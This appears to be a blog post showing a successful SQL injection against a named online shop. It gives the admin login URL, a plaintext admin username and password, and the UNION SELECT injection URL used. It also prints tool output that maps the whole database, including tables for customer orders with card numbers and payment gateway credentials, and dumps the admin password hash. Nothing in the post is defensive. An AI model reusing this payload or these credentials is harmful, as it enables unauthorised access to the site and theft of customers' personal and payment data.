Admin login page --> http://www.theperfusionstore.com/admin/
Admin usr:pwd --> admin:p3rfusion
Dump:
[+] URL:http://www.theperfusionstore.com/shop/detail.php?cat=4&ID=13+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 20:30:50
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: perfusion
User: perfusion@48-47.84.64.master-link.com
Version: 5.0.45-Debian_1ubuntu3.1-log
[Database]: perfusion
[Table: Columns]
[0]config: ID,site_name,site_fullname,site_css,site_bgcolor,site_logolg,site_logosm,site_images,site_productimages,site_font1,site_font2,site_font3,site_font4,site_font5,site_color1,site_color2,site_color3,site_color4,site_color5,site_textcolor,site_copyright,site_address,site_address2,site_city,site_state,site_zip,site_fax,site_phone,site_email,site_url,site_notify,site_receipt,xSaleDiscount,xSalesTax,xShipRate,xHandling,receiptCopy,xIntShipRate,paymentgateway,send_receipt,send_notification,show_debug
[1]contacts: ID,firstname,lastname,address,address2,city,state,zip,phone,email,newsletter,entryDate
[2]gtwy_anet: ID,transkey,login,password,test_request,x_type,keepccard,x_processType,gatewayURL,x_Version,x_Merchant_Email,x_ADC_URL,x_ADC_delim_data,x_Delim_Data,x_description
[3]gtwy_linkpoint: ID,storeno,password,keyfile,gatewayURL,port,mode
[4]newsletter: ID,theSubject,box1,box2,box3,box4,box5,entryDate
[5]tblcalendar: ID,title,leadin,articlebody,articledate,entryDate,isactive,location,purchaseurl,moreurl,onhome,type,moreinfourl,fee,time
[6]tblcase: id,casetype
[7]tblcategories: ID,hidden,category,parent,description,image,titleimage,displayorder
[8]tblcontacts: ID,FirstName,LastName,Email,Phone,Fax,Address,City,Zip,State,bestContact,comments,postcard,referral,entryDate,optin
[9]tblcustomers: ID,firstname,lastname,address1,address2,city,state,zip,country,company,phone,fax,email,website,sfirstname,slastname,saddress1,saddress2,scity,sstate,szip,scountry,scompany,sphone,sfax,notes,newsletter,entryDate,lastUpdated
[10]tbllinks: ID,onhome,isactive,linkname,description,url
[11]tblmakes: ID,name
[12]tblmediaaccess: ID,uname,pword,disabled
[13]tblnews: ID,title,leadin,articlebody,articledate,entryDate,isactive,byline,bylineurl,moreurl,onhome,attachment
[14]tblorderitems: ID,RelOrderID,RelProductID,Quantity,Size,RelUnitPrice,Options,Shipping,Discount,Processed,Status,Title
[15]tblorders: OrderID,uuid,customerid,dealer,dealerRep,dealerPO,CCNum,CCName,CCYear,CCMonth,CCType,CVSNum,SaleSubTotal,SaleTotal,Tax,handling,Shipping,ShippingTotal,Discount,DiscountRate,UPS,IntlFee,ShippingMethod,Status,DateIn,TimeIn,bFirstName,bLastName,bAddress1,bAddress2,bCity,bCounty,bState,bZip,bPhone,sFirstName,sLastName,sAddress1,sAddress2,sCity,sState,sCounty,sZip,sPhone,sCountry,bCountry,Message,bFax,sFax,bCompany,sCompany,bEmail,sEmail,ipaddress,oAuthorization,lastModified,shippingdate,intorder
[16]tblpaymentgateway: ID,gateway,name,tablename,module
[17]tblproducts: ID,isactive,onsale,product,sku,price,saleprice,listprice,category,has_sizes,description,weight,shipping,status,feature1,feature2,feature3,feature4,image1,image2,image3,image4,entryDate,lastmodified
[18]tblsitecontent: ID,section,content
[19]tblstatus: id,status
[20]tblstyle: id,style
[21]tbltypes: ID,name
[22]tbluserlog: fldauto,fldusername,fldinout,fldipaddress,entryDateTime
[23]tbluserroles: UserRoleID,UserRoleName,UserRoleType,UserRoleFunction
[24]tbluserroletypes: ID,UserRoleType
[25]tblusers: UserID,lastname,firstname,permission,username,password,email,comments,roles,disabled,superUser,lastlogin
[-] [20:39:01]
[-] Total URL Requests 311
[-] Done
[+] URL:http://www.theperfusionstore.com/shop/detail.php?cat=4&ID=13+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 20:40:01
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: perfusion
User: perfusion@48-47.84.64.master-link.com
Version: 5.0.45-Debian_1ubuntu3.1-log
[+] Dumping data from database "perfusion" Table "tblusers"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1
[0] admin:85c51eef704f837ab85006998db06448:
[-] [20:40:07]
[-] Total URL Requests 3
[-] Done
0 comments:
Post a Comment